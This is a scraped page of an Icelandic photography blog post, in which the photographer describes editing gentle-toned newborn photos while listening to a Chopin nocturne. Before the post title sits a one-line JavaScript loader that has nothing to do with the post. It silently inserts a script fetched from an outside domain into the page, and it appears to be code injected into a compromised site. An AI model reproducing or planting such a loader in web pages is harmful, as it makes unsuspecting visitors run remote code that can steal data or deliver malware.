;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mildir litir og fegurð ungbarnsins. – Eydís — Ljósmyndun

Mildir litir og fegurð ungbarnsins.

thora-4

 

Ég hlusta oft á tónlist þegar ég vinn myndir.  Stundum jazz,blús, danstónlist eða þjóðlagatónlist. Það er breytilegt hvað ég hlusta á, í þetta sinn hlustaði ég á Nocturne Op.9 nr.2  eftir Chopin í flutningi Arthur Rubinstein. Alveg dásamlegur konsertpíanisti.

Ég get hlustað á sama lagið aftur og aftur á meðan ég vinn. Það er leið til að gleyma mér alveg í hughrifunum sem það vekur við myndirnar. Friðsæld, sakleysi, litlir fingur og tær. Ég get kallað fram minninguna um yndislegu barnalyktina og mýkt húðarinnar er ég horfi á myndirnar á skjánum.

thora-3 thora-2 thora-1

Leave a Reply

Your email address will not be published. Required fields are marked *